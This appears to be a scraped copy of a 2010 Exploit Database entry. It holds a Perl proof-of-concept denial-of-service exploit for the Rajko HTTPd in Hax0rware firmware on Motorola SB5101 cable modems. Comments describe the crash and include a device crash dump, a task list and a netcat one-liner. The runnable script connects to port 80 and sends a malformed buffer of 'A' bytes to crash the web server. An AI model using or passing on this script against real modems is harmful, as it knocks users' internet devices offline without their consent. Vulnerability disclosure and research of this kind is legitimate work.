Motorola SB5101 Hax0rware Rajko HTTPd – Remote Denial of Service (PoC)

Exploit Database
130 阅读

作者： Dillon Beresford

日期： 2010-06-08
类别：
- dos
平台：
- hardware
来源：https://www.exploit-db.com/exploits/13774/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

#!/usr/bin/perl

# Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC

# Author: Dillon Beresford

# Date: 6/6/2010

# Vendor: SBHacker & Motorola

# Software Link: http://www.sbhacker.net/forum/index.php

# Tested on Hax0rware 1.1 R30, R32 and R39

# Description: Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit

# If an unauthenticated user or attacker sends any number of bytes greater than 1

# to port 80 without a proper request line, such as, [ GET /somepath/file.cgi ]

# the http daemon triggers a crash on thread at 0x8054b9ac Rajko HttpD.

# The developer of Hax0rware said he has used the modem's local ip to bind to the webserver

# to prevent attackers from triggering the vuln... This seems to be a quick fix atm.

# I'm sure he will eventually fix the bug and update the firmware.

# Motorola and Cable providers should warn their customers ( there are a number of legit )

# customers using this firmware for testing. Its important that you let

# customers know about the risk of third party firmware that isn't open source.

# nc 192.168.100.1 80 <sendsomeevil>

# For debugging telnet into the device 192.168.100.1 and run the poc.

# >>> YIKES... looks like you may have a problem! <<<

# r0/zero=00000000 r1/at=fffffffe r2/v0=805a1800 r3/v1=00000000

# r4/a0=8054aa58 r5/a1=00000000 r6/a2=00000000 r7/a3=00000000

# r8/t0=00000000 r9/t1=807bcae4 r10/t2 =00000041 r11/t3 =000043e0

# r12/t4 =4d154e68 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005

# r16/s0 =8054bacc r17/s1 =00000000 r18/s2 =805a1800 r19/s3 =00000000

# r20/s4 =00000001 r21/s5 =0000002a r22/s6 =8054b848 r23/s7 =00000001

# r24/t8 =00000000 r25/t9 =00000059 r26/k0 =00000000 r27/k1 =11110017

# r28/gp =80458fa0 r29/sp =8054b830 r30/fp =8054b960 r31/ra =8054a514

# PC : 0x8054a534error addr: 0x00000000

# cause: 0x00000008status: 0x1000ff03

# BCM interrupt enable: ffffbff7, status: 00000000

# Bad PC or SP.Can't trace the stack.

# Task: Rajko HttpD

# ---------------------------------------------------

# ID: 0x0006

# Handle: 0x8054b9ac

# Set Priority: 23

# Current Priority: 23

# State:SUSP

# Stack Base: 0x8054acd4

# Stack Size: 3280 bytes

# Stack Used: 1940 bytes

# Stack StackStack

#TaskId TaskNamePriority StateSizeUsed Margin

# ---------- ------------------------------------------------------------------------

# 0x8048f818 Idle Thread31 RUN 2048 6161432

# 0x805131d0 Network alarm support 6 SLEEP 225612321024

# 0x804924c8 Network support 7 SLEEP 819217046488

# 0x80513f20pthread.0000080015EXIT 785211046748

# 0x8048a1c8tStartup18 SLEEP1228852087080

# 0x8054b9ac Rajko HttpD23SUSP 328019401340

# 0x807f579cNonVol Device Async Helper25 SLEEP 3072 5042568

# 0x807ebc7cMotorola Standby Switch Thread23 SLEEP 4096 4403656

# 0x807ea984Motorola Vendor Ctl Thread23 SLEEP 4096 5123584

# 0x807f64e8WDOG17 RUN 512027842336

# 0x807e86b4 BFC Ping Thread29 SLEEP 6144 4765668

# 0x807e4b3c ConsoleThread27 SLEEP368642172 34692

# 0x807d687c TelnetD23 RUN 22561980 276

# 0x807c666cCfgVB Thread23 SLEEP 4096 5043592

# 0x807c501cDHCM25 SLEEP16384 512 15872

# 0x807befacEvent Log Thread25 SLEEP 819221846008

# 0x8079a51cTime Of Day Thread23 SLEEP 6144 4565688

# 0x8079a98cCmDocsisIpThread23 SLEEP 8192 5047688

# 0x80793af8 CmBpiManagerThd25 SLEEP 8192 5087684

# 0x8078ff78 CmDsxHelper23 SLEEP 8192 5047688

# 0x807abf50 CmDocsisCtlThread21 SLEEP 8192 6087584

# 0x80788e44Scan Downstream Thread23 SLEEP 409614282668

# 0x80785c20RateShaping Thread23 SLEEP 4096 4443652

# 0x807f65e0CMHL23 SLEEP 4500 3684132

# 0x807f66d8CMHH21 SLEEP 4500 3524148

# 0x807f67d0ENRX23 RUN 450010283472

# 0x807f68c8ENTX23 SLEEP 4500 7843716

# 0x807f69c0ELNK23 SLEEP 4500 3204180

# 0x807f6ab8USTX23 SLEEP 4500 3404160

# 0x807f6bb0USRX23 SLEEP 4500 3724128

# 0x807f6ca8UBCT19 SLEEP 4500 3564144

# 0x807f6da0USRN23 SLEEP 4500 3404160

# 0x806a5a34DHCP Client Thread23 SLEEP12288 508 11780

# 0x807f6e98IpHalIst23 RUN 4500 8443656

# 0x8069fb98CmPropaneCtlThread23 SLEEP 819216286564

# 0x8069cf3c IGMP Thread23 SLEEP 4096 4563640

# 0x8069b640 NetToMedia Thread23 SLEEP 4096 7963300

# 0x806975a8 Trap Thread23 SLEEP16384 516 15868

# 0x807f6030 SNMP Thread23 SLEEP204801176 19304

# 0x805a7f0cDHCP Server Thread23 SLEEP 819214486744

# 0x8047b410tNonVolTimer30 SLEEP 204810281020

# Done!

# * *

#*** ***

# ***** *****

#******* *******

# ********* *********

# ******* *******

#*********

#*** * ***

#** **

# ** **

#** **

#* *

#MotorolaCorporation

# +----------------------------------------------------------------------------+

# | _/_/ _/_/_/_/_/_/|

# |_/_/ _/_/_/ Broadband |

# | _/_/ _/_/|

# |_/_/ _/_/_/_/ Foundation|

# | _/_/ _/_/|

# |_/ _/_/_/_/ Classes |

# | _/_/_/ _/_/_/|

# ||

# | Revision:3.9.33.3 RELEASE|

# ||

# | Features:Console Nonvol Fat HeapManager SNMP Networking USB1.1 |

# +----------------------------------------------------------------------------+

# | Standard Embedded Target Support for BFC |

# ||

# | Revision:3.0.1 RELEASE |

# ||

# | Features:PID=0xc011 Bootloader-Rev=2.1.6d|

# ||

# | Revision:3.0.1 RELEASE |

# ||

# | Features:PID=0xc011 Bootloader-Rev=2.1.6d|

# | Features:Bootloader-Compression-Support=0x19 |

# +----------------------------------------------------------------------------+

# | eCos BFC Application Layer |

# ||

# | Revision:3.0.2 RELEASE |

# ||

# | Features:eCos Console Cmds, (no Idle Loop Profiler)|

# +----------------------------------------------------------------------------+

# | _/_/_/ _/|

# |_/_/_/_/ _/_/ DOCSIS Cable Modem|

# | _/_/_/ _/|

# |_/_/ _/ |

# | _/_/ _/|

# |_/_/_/ _/ |

# | _/_/_/ _/|

# ||

# | Revision:3.9.33.3 RELEASE|

# ||

# | Features:AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |

# | Features:Support CM Vendor Extension |

# +----------------------------------------------------------------------------+

# | Motorola Data-Only CM Vendor Extension |

# ||

# | Revision:3.0.0a RELEASE|

# ||

# | Features:DHCP ServerHTTP Server|

# +----------------------------------------------------------------------------+

# | Build Date:Apr 29 2009 |

# | Build Time:15:08:51|

# | Built By:vobadm02|

# +----------------------------------------------------------------------------+

use strict;

use Socket;

my $buff = "\x41" x50;

my $cablemodemip = shift || '192.168.100.1';

my $port = shift || 80;

my $proto = getprotobyname('tcp');

my $iaddr = inet_aton($cablemodemip);

my $paddr = sockaddr_in($port, $iaddr);

print "+---------------------------------------------------------------+\n".

"| Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC|\n".

"| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n".

"| Version: 1.1 R30, R32 and R39 |\n".

"| Vendor: Motorola Corporation and SBHacker |\n".

"| Author: Dillon Beresford|\n".

"| Date: 6/6/2010|\n".

"+---------------------------------------------------------------+\n";

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";

print "[+] Connecting to cable modem httpd at $cablemodemip on port $port\n";

connect(SOCKET, $paddr) or die "connect: $!";

print "[+] Sending our evil buffer...\n";

print SOCKET $buff."\n";

print "[+] Payload sent\n";

print "[+] This takes some time please wait.\n";

print "[+] Dont look at me look at the leds on your modem\n";

close SOCKET or die "close: $!";

sleep(25);

print "[+] Bye Bye Motorola SB5101 \n";